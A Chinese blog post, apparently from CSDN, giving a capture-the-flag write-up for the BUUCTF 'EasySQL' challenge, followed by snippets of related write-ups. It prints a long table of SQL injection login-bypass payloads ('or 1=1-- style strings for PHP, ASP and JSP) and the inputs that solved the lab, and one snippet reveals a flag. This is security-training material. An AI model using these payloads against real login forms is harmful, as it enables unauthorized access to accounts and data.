[极客大挑战 2019]EasySQL1

已于 2022-04-30 16:42:19 修改
阅读量4.2k 收藏 15
点赞数
文章标签: vscode 编辑器 macos
于 2022-03-09 21:21:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/tomatoff/article/details/123387646
版权

课程名称:[极客大挑战 2019]EasySQL1

1、访问地址,发现是一个登录页面,所以这题应该是SQL注入;
在这里插入图片描述
2、尝试用账户admin、密码123456登陆,页面提示错误用户名、密码;
3、再尝试闭合方式,账号输入1,1’,1"判断,当输入为1’时报错,所以判断结果语句应该为单引号闭合;

4、这里提供一下万能密码表
万能密码表(收集于网络)
语言 万能密码 PHP ‘or 1=1/*
"or “a”="a
“or 1=1–
“or”=”
“or”="a’=‘a
“or1=1–
“or=or”
'‘or’=‘or’
‘) or (‘a’=‘a
‘.).or.(’.a.’=’.a
'or 1=1
'or 1=1–
'or 1=1/*
'or”="a’=‘a
‘or’ ‘1’=‘1’
‘or’’=’
‘or’‘=’‘or’‘=’
‘or’=‘1’
‘or’=‘or’
‘or.‘a.’=‘a
‘or1=1–
1’or’1’=‘1
a’or’ 1=1–
a’or’1=1–
or ‘a’=‘a’
or 1=1–
or1=1-- asp aspx "or “a”="a
‘.).or.(’.a.’=’.a
or 1=1–
‘or 1=1–
a’or’ 1=1–
"or 1=1–
‘or.‘a.’=‘a
“or”="a’=‘a
‘or’’=’
or’=‘or’ jsp 1’or’1’=‘1
admin’ or 1=1/*
5、经过多次尝试,发现使用左右边界为【’】的密码才能正确输出的flag;
6、可以使用的用户名和密码有很多种,例如:
(1)a’ or ‘1’=‘1
(2)php’or’‘=’
7、输入flag,完成答题。

部分内容参考自:https://zhuanlan.zhihu.com/p/137760825https://blog.youkuaiyun.com/emdog/article/details/120878215?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EOPENSEARCH%7ERate-1.pc_relevant_default&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EOPENSEARCH%7ERate-1.pc_relevant_default&utm_relevant_index=2

Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
ccc6553584的博客
04-03 1044
输入11"时,没有SQL语句报错,只是提示我们输入的值是不对的,因此我们可以先假设SQL语句闭合方式是单引号username输入1时,形成的sql语句是username输入1"时,形成的sql语句是正确的当字符串内需要包含双引号时,除了使用转义字符外,也可以使用一对单引号来包括字符串。字符串内的双引号被视为普通字符,无需特殊处理同理,当字符串内需要包含单引号时,除了使用转义字符外,也可以使用一对双引号来包括字符串。字符串内的单引号被视为普通字符,无需特殊处理username输入的是1'
[SUCTF 2019]EasySQL1
2301_79351980的博客
03-18 344
post[‘query’]的数据为*,1,sql语句就变成了select *,1||flag from Flag。3.使用堆叠查看数据表发现flag。1.使用万能钥匙发现不行。4.查看flag发现不行。2.使用堆叠查看数据库。
[极客挑战 2019]EasySQL 1
天天学安全专属博客
03-04 1466
[极客挑战 2019]EasySQL 1,暴力破击,弱口令,万能密码
BUUCTF在线测评之[极客挑战 2019]EasySQL 1
weixin_49182737的博客
03-03 5645
启动靶机 只给了一个地址,点击进去即是靶机 可以看到这是一个登录页面 虽然靶机信息那已经提示我们这是一个EasySql,结合靶机页面是登录页面,把八九不离十的可以确定这一题是考察SQL注入的,并且Easy提示我们,是简单的sql注入。 BUT出于一个网安爱好者的心态,我们还是要简单看一下这个页面的信息,说不定出题者挖坑呢 。。。 虽然结果是然并卵 所以还是老老实实听提示试sql注入吧 这里安利一下firefox,这浏览器可以在拓展里装Hackbar,一款房间寻找web安全bug的插件 一个不太好的信息时
BUUCTF | Web [极客挑战 2019]EasySQL-- BUUOJ WriteUP
zxsctf的博客
07-15 464
测试的时候输入了1’and‘1’=1这个有问题的payload,看报错信息中带有一个andpassword=‘1’and‘1’=1说明sql语句是SELECT*FROMtablesWHEREusername=‘1’and‘1’=1andpassword=‘1’and‘1’=1类似这样的查询,and的两边同时为TRUE结果才能为TRUE,所以输入的payload一定要符合这个条件就可以登录成功了。我们要从最简单的题目开始做起,一点一点的培养我们的网络安全技术。...
【WEB】[极客挑战2019]EasySQL WP
Miscedence__的博客
04-15 490
0X0000000000000001 审题 其实由题目可以知道这是道SQL注入,然后看到登录,首先尝试万能密码: admin’ or ‘1’='1 如名字所说,这是一道很ez的SQL注入 通过这道题,我们来延伸一下其他东西 0X0000000000000002 关于万能密码 为什么在注入的时候输入万能密码就可以进入呢,对于所有万能密码,都是”万能“的吗? 那么首先,让我们清楚 SQL注入-万能密码的注入原理 0_用户进行用户名和密码验证时,网站需要查询数据库,查询数据库就是执行SQL语句 //
极客挑战 2019EasySQL
Knsec
05-13 9919
[极客挑战 2019] EasySQL 判断是数字还是字符型注入 正常查询的回显 输入字符型判断一下,发现报错了,看报错显示 ‘1’‘’,输入的是1’,这里查询语句中应该是存在一个单引号的,所以这里报错了,多了一个单引号,说明这里存在字符型的注入,先用万能钥匙测测 使用万能钥匙一测,第一次 正常回显错误,然后又用字符型的测了一下,发现这里的报错中带有 一部分的查询语句 # 万能公式 1 and 1=1 1' and '1'='1 1 or 1=1 1' or '1'='1
BUUCTF[极客挑战 2019] EasySQL 1
m0_75178803的博客
06-12 5490
因为这道题是基于sql单引号的注入,我们构造万能密码,#在sql注入中是注释符。题目来源:BUUCTF [极客挑战 2019] EasySQL 1。用or连接,因为1=1恒真,假或真=真,真或真=真,所以这个语句恒成立。输入 1' union select 1,2,3。查看报错信息发现是基于单引号的注入。由一道题简单引出万能密码的知识点。这是查询数据库可能会用到的句型。只有当输入1’时,页面报错。直接在用户名或者密码区输入。只有当列名字段数为3时,
BUUCTF: [极客挑战 2019]EasySQL 1
anyhowanywhere的博客
09-26 772
[极客挑战 2019]EasySQL 1
[极客挑战 2019]EasySQL
Sk1y的博客
12-18 593
[极客挑战 2019]EasySQL 打开题目,是一个登录界面,在用户名中输入万能密码 1' or 1=1# 试一下,密码随意写 就这样登录成功了!同时得到了flag{d94b525b-a323-4d69-b6b1-210a8e824572} 然后又试了一下,用户名和密码中只要有一个是1' or 1=1#,就可以登录成功。 上述是实际解法,如果想要更加了解原理的话,推荐一个师傅的wp——绕圈子的解法 这个师傅讲得很透彻!!! ...
极客挑战 2019]EasySQL 1
最新发布
03-27
引用1提到sqli-labs和sqlmap的学习资料,以及buuctf上的真题练习,包括几个具体的题目,其中就有[极客挑战 2019]EasySQL。引用2则给出了一个具体的万能密码尝试的例子,如username=1'or 1=1%23&password=1。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值